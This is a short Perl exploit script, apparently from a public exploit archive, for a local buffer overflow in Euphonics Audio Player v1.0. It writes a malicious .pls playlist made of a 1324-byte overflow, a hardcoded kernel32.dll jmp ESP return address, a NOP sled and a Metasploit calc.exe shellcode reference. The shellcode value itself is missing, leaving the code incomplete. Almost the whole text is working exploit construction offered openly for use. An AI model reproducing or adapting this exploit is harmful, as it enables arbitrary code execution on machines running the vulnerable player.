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#!/usr/bin/perl -w
# Author : h4ck3r#47
# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
# Tested in Windows Pro Sp3 (English)
# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends
my $overflow = "\x41" x 1324;
my $ret = "\x7B\x46\x86\x7C"; # jmp ESP from kernel32.dll in Windows pro Sp3
my $nop = "\x90" x 100 ;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $shellcode =

my $file="hx.pls";

$exploit = $overflow.$ret.$nop.$shellcode;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
print "Done \n";

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